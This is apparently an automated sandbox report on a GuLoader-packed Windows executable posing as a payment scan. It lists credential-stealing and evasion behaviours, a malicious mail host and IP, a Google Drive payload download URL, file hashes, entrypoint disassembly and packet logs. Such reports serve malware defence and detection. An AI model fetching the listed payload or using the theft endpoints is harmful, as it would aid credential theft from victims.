            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 530423 Sample: Scanned Payment Copy00024.scr.exe Startdate: 29/11/2021 Architecture: WINDOWS Score: 100 23 mail.furteksdokuma.com.tr 2->23 25 furteksdokuma.com.tr 2->25 27 3 other IPs or domains 2->27 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected GuLoader 2->39 41 5 other signatures 2->41 8 Scanned Payment Copy00024.scr.exe 1 2 2->8         started        signatures3 process4 signatures5 43 Writes to foreign memory regions 8->43 45 Tries to detect Any.run 8->45 47 Hides threads from debuggers 8->47 11 CasPol.exe 11 8->11         started        15 CasPol.exe 8->15         started        17 conhost.exe 8->17         started        19 CasPol.exe 8->19         started        process6 dnsIp7 29 furteksdokuma.com.tr 116.202.203.61, 49817, 587 HETZNER-ASDE Germany 11->29 31 googlehosted.l.googleusercontent.com 142.250.184.225, 443, 49808 GOOGLEUS United States 11->31 33 drive.google.com 142.250.186.46, 443, 49807 GOOGLEUS United States 11->33 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 59 3 other signatures 11->59 21 conhost.exe 11->21         started        55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->57 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Scanned Payment Copy00024.scr.exe33%ReversingLabsWin32.Worm.GenericML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            furteksdokuma.com.tr0%VirustotalBrowse
            mail.furteksdokuma.com.tr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://yjmpHNwxHQcW4vG64IN.comt-0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://mail.furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://OXDyLI.com0%Avira URL Cloudsafe
            http://yjmpHNwxHQcW4vG64IN.com0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.184.225
              truefalse
                high
                furteksdokuma.com.tr
                116.202.203.61
                truetrueunknown
                mail.furteksdokuma.com.tr
                unknown
                unknowntrueunknown
                doc-08-9o-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://yjmpHNwxHQcW4vG64IN.comt-CasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSCasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sectigo.com/CPS0CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-08-9o-docs.googleusercontent.com/mond1CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/CasPol.exe, 00000006.00000003.45582109060.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383368510.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpfalse
                        high
                        https://drive.google.com/sCasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpfalse
                          high
                          http://furteksdokuma.com.trCasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.furteksdokuma.com.trCasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpfalse
                            high
                            http://OXDyLI.comCasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://yjmpHNwxHQcW4vG64IN.comCasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45584258822.000000001CDE1000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394924557.000000001E065000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-08-9o-docs.googleusercontent.com/CasPol.exe, 00000006.00000003.44649168355.0000000001174000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpfalse
                              high
                              https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://doc-08-9o-docs.googleusercontent.com/C=CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmpfalse
                                high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.186.46
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                142.250.184.225
                                googlehosted.l.googleusercontent.comUnited States
                                15169GOOGLEUSfalse
                                116.202.203.61
                                furteksdokuma.com.trGermany
                                24940HETZNER-ASDEtrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:530423
                                Start date:29.11.2021
                                Start time:15:51:27
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 53s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Scanned Payment Copy00024.scr.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@9/2@3/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 95%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.19.171
                                • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:54:02API Interceptor2719x Sleep call for process: CasPol.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                116.202.203.61FAKTURA 9502461485.exeGet hashmaliciousBrowse
                                  exe.exeGet hashmaliciousBrowse
                                    FACTURAS.exeGet hashmaliciousBrowse
                                      sG98fX27l7.exeGet hashmaliciousBrowse
                                        BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                          ejecutable.exeGet hashmaliciousBrowse
                                            TT COPY.exeGet hashmaliciousBrowse
                                              PEDIDO.exeGet hashmaliciousBrowse
                                                Request Quotation.exeGet hashmaliciousBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  HETZNER-ASDEFAKTURA 9502461485.exeGet hashmaliciousBrowse
                                                  • 116.202.203.61
                                                  2.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  2.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                  • 144.76.136.153
                                                  BL_CI_PL.exeGet hashmaliciousBrowse
                                                  • 88.99.22.5
                                                  web-2099508479.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-2099508479.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-1859712127.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-1859712127.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  d2REPCiUoqGet hashmaliciousBrowse
                                                  • 5.75.234.243
                                                  web-1673899678.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-1673899678.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-1142655642.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-1142655642.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-115940.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144
                                                  web-115940.xlsGet hashmaliciousBrowse
                                                  • 116.202.249.144

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19Sifaris verin.9098865432.PDF.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  win-1501243850.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  Statement.htmlGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  EbnkVHjGin.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  FAKTURA 9502461485.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  2.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  BL_CI_PL.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web-2099508479.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web-1859712127.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  PKngA2BEjB.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web-1673899678.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  61c526c5-c558-462b-b5a9-138a62b439e5.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  panionic.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web-1142655642.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  FACTURAS.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  web-115940.xlsGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  jH9lY2utAE.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225
                                                  SecuriteInfo.com.W32.AIDetect.malware1.18149.exeGet hashmaliciousBrowse
                                                  • 142.250.186.46
                                                  • 142.250.184.225

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\~DFEFF002A05981B24C.TMP
                                                  Process:C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):1.9866006611106688
                                                  Encrypted:false
                                                  SSDEEP:96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
                                                  MD5:A256BBA112F7FA34FE9E19ED07D0DF83
                                                  SHA1:3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
                                                  SHA-256:AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
                                                  SHA-512:9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  \Device\ConDrv
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):30
                                                  Entropy (8bit):3.964735178725505
                                                  Encrypted:false
                                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                  MD5:9F754B47B351EF0FC32527B541420595
                                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: NordVPN directory not found!..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):5.028365197002993
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:Scanned Payment Copy00024.scr.exe
                                                  File size:155648
                                                  MD5:9ebaab853c410a3c6ef16ecf45739e8b
                                                  SHA1:67c221c5f1329829d7a808791dc030bf1288d2d7
                                                  SHA256:b24869692ba4efa8bb957cb2334ac798b570277c038db867db5a177a0e9a54ec
                                                  SHA512:c0945c9b720ee31b8d2651ec584a02ca4373692dd1712fb09f4f87692c141bb86fd2f84b6b9dfa17f4bda49a7014682bdf7a0430b627381c6515ea679b9dabc3
                                                  SSDEEP:1536:flfJffvxToSdAB/6lUUyaNTAETxEvZ0swq+A6T++DqfJffpfJff:9fJff9oKM/6ljyK5adwXqfJffpfJff
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...i.xT.....................P............... ....@................

                                                  File Icon

                                                  Icon Hash:70ecccaececc71e2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4015a8
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                  DLL Characteristics:
                                                  Time Stamp:0x5478D769 [Fri Nov 28 20:13:29 2014 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:458ac857eb15a6ebaad7748f2f663dae

                                                  Entrypoint Preview

                                                  Instruction
                                                  push 00402D28h
                                                  call 00007F2DC0A42855h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  xor byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  inc eax
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [ecx], al
                                                  mov byte ptr [ebx+63h], dl
                                                  and ebx, ebp
                                                  or eax, 75ECAF4Ch
                                                  or ebx, dword ptr [edi+edi*2+00005007h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add dword ptr [eax], eax
                                                  add byte ptr [eax], al
                                                  and byte ptr [ecx+73h], al
                                                  and byte ptr [ecx+6Eh], cl
                                                  inc edx
                                                  jne 00007F2DC0A428D4h
                                                  jne 00007F2DC0A428C5h
                                                  push 73003661h
                                                  bound eax, dword ptr [edx+70h]
                                                  xor dh, byte ptr [ebx+32h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  dec esp
                                                  xor dword ptr [eax], eax
                                                  add eax, 98CA9952h
                                                  ror byte ptr [ecx-34h], cl
                                                  inc esi
                                                  mov eax, E7A55955h
                                                  lea edx, ecx
                                                  je 00007F2DC0A428B1h
                                                  mov edx, FB574C67h
                                                  inc edi
                                                  test al, 6Fh
                                                  inc edx
                                                  jmp dword ptr [edi]
                                                  loope 00007F2DC0A4287Eh
                                                  pop ds
                                                  cmp cl, byte ptr [edi-53h]
                                                  xor ebx, dword ptr [ecx-48EE309Ah]
                                                  or al, 00h
                                                  stosb
                                                  add byte ptr [eax-2Dh], ah
                                                  xchg eax, ebx
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  outsb
                                                  push ss
                                                  add byte ptr [eax], al
                                                  jnp 00007F2DC0A42877h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], al
                                                  dec ebp
                                                  inc ecx
                                                  push ebp
                                                  inc esp
                                                  add byte ptr [54000401h], cl
                                                  outsd
                                                  outsb
                                                  imul eax, dword ptr [eax], 42000119h
                                                  add byte ptr [ebx], ah

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x212640x28.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x2f2c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x208380x21000False0.353278882576data5.18913238109IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .data0x220000x12500x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x240000x2f2c0x3000False0.232584635417data4.20201309343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  CUSTOM0x259920x1542dataEnglishUnited States
                                                  RT_ICON0x248ea0x10a8data
                                                  RT_ICON0x244820x468GLS_BINARY_LSB_FIRST
                                                  RT_STRING0x26ed40x58dataEnglishUnited States
                                                  RT_GROUP_ICON0x244600x22data
                                                  RT_VERSION0x241c00x2a0dataEnglishUnited States

                                                  Imports

                                                  DLLImport
                                                  MSVBVM60.DLL__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0409 0x04b0
                                                  LegalCopyrightCorps
                                                  InternalNameDybblsbro
                                                  FileVersion1.00
                                                  CompanyNameCorps
                                                  LegalTrademarksCorps
                                                  ProductNameCorps
                                                  ProductVersion1.00
                                                  FileDescriptionCorps
                                                  OriginalFilenameDybblsbro.exe

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2021 15:53:51.348495960 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.348556995 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.348730087 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.367091894 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.367130995 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.418879986 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.419064999 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.420928955 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.421144962 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.531699896 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.531789064 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.532505035 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.532669067 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.536093950 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.580007076 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.865696907 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.865854979 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.865900993 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.866094112 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.866125107 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.866209030 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.866235971 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.866344929 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.870477915 CET49807443192.168.11.20142.250.186.46
                                                  Nov 29, 2021 15:53:51.870541096 CET44349807142.250.186.46192.168.11.20
                                                  Nov 29, 2021 15:53:51.959650993 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:51.959747076 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:51.959887028 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:51.960223913 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:51.960269928 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.006416082 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.006601095 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.007842064 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.008091927 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.011596918 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.011614084 CET44349808142.250.184.225192.168.11.20
